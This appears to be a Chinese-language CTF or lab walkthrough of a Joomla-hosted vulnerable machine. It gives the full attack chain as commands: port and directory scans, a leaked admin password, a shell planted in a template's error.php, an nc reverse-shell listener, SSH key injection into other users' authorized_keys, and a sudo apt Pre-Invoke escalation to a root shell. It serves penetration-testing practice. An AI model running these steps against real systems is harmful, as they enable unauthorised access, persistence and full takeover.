nmap扫描端口:
nmap 192.168.0.19 -p-
![https://s4.ax1x.com/2022/01/05/TjpPr6.png](https://s4.ax1x.com/2022/01/05/TjpPr6.png)
web浏览器打开80端口:
![https://s4.ax1x.com/2022/01/05/Tjppx1.png](https://s4.ax1x.com/2022/01/05/Tjppx1.png)
web扫描器识别到是joomla框架:
![https://s4.ax1x.com/2022/01/05/TjpkVO.png](https://s4.ax1x.com/2022/01/05/TjpkVO.png)
gobuster扫描joomla后台路径:
gobuster.exe dir -u http://192.168.0.19/joomla/ -w dir.txt
![https://s4.ax1x.com/2022/01/05/TjpZPH.png](https://s4.ax1x.com/2022/01/05/TjpZPH.png)
![https://s4.ax1x.com/2022/01/05/TjpeGd.png](https://s4.ax1x.com/2022/01/05/TjpeGd.png)
登录名和密码在/test/password文件的源码中:
![https://s4.ax1x.com/2022/01/05/TjpS2R.png](https://s4.ax1x.com/2022/01/05/TjpS2R.png)
![https://s4.ax1x.com/2022/01/05/TjSxPJ.png](https://s4.ax1x.com/2022/01/05/TjSxPJ.png)
管理员是admin,密码是3iqtzi4RhkWANcu@$
![https://s4.ax1x.com/2022/01/05/TjpnxI.png](https://s4.ax1x.com/2022/01/05/TjpnxI.png)
编辑模板文件上传shell:
![https://s4.ax1x.com/2022/01/05/Tjpds0.png](https://s4.ax1x.com/2022/01/05/Tjpds0.png)
![https://s4.ax1x.com/2022/01/05/TjpDdU.png](https://s4.ax1x.com/2022/01/05/TjpDdU.png)
在error.php中插入shell,这样访问出现错误时,就会自动访问到error.php文件,就可以反弹。
提权:
nc监听端口:
nc.exe -lvvp 1234
访问错误地址反弹nc:
![https://s4.ax1x.com/2022/01/05/TjproF.png](https://s4.ax1x.com/2022/01/05/TjproF.png)
![https://s4.ax1x.com/2022/01/05/Tjpyi4.png](https://s4.ax1x.com/2022/01/05/Tjpyi4.png)
![https://s4.ax1x.com/2022/01/05/Tjp6JJ.png](https://s4.ax1x.com/2022/01/05/Tjp6JJ.png)
登录用户是www-data。存在另外两个用户一个是shenron,另一个用户是jenny。
在/var/www/html/joomla/configuration.php存在jenny的密码:
![https://s4.ax1x.com/2022/01/05/TjerGV.png](https://s4.ax1x.com/2022/01/05/TjerGV.png)
![https://s4.ax1x.com/2022/01/05/TjpWsx.png](https://s4.ax1x.com/2022/01/05/TjpWsx.png)
![https://s4.ax1x.com/2022/01/05/Tjm1eJ.png](https://s4.ax1x.com/2022/01/05/Tjm1eJ.png)
通过把ssh公钥写入jenny目录下的.ssh文件夹下的authorized_keys中,就可以用私钥登录到jenny。
cd .ssh
echo __public key__ >> authorized_keys
echo ssh-rsa "生成的公钥串" >> authorized_keys
![https://s4.ax1x.com/2022/01/05/TjuSKS.png](https://s4.ax1x.com/2022/01/05/TjuSKS.png)
![https://s4.ax1x.com/2022/01/05/TjubsU.png](https://s4.ax1x.com/2022/01/05/TjubsU.png)
使用shenron的cp命令替换.ssh文件夹下的authorized_keys,替换成jenny的公钥,这样就可以用jenny的私钥登录到shenron用户。
cp /home/jenny/.ssh/authorized_keys /tmp/ #复制jenny的authorized_keys文件到/tmp/两个用户都可以读取
sudo -u shenron cp /tmp/authorized_keys /home/shenron/.ssh/
![https://s4.ax1x.com/2022/01/05/TjMe74.png](https://s4.ax1x.com/2022/01/05/TjMe74.png)
![https://s4.ax1x.com/2022/01/05/TjQ9bD.png](https://s4.ax1x.com/2022/01/05/TjQ9bD.png)
![https://s4.ax1x.com/2022/01/05/TjMfCn.png](https://s4.ax1x.com/2022/01/05/TjMfCn.png)
![https://s4.ax1x.com/2022/01/05/TjQE8I.png](https://s4.ax1x.com/2022/01/05/TjQE8I.png)
sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh #使用apt命令提权
![https://s4.ax1x.com/2022/01/05/TjQmKf.png](https://s4.ax1x.com/2022/01/05/TjQmKf.png)
![https://s4.ax1x.com/2022/01/05/TjQl5j.png](https://s4.ax1x.com/2022/01/05/TjQl5j.png)
下载地址:
ctf提权辅助工具: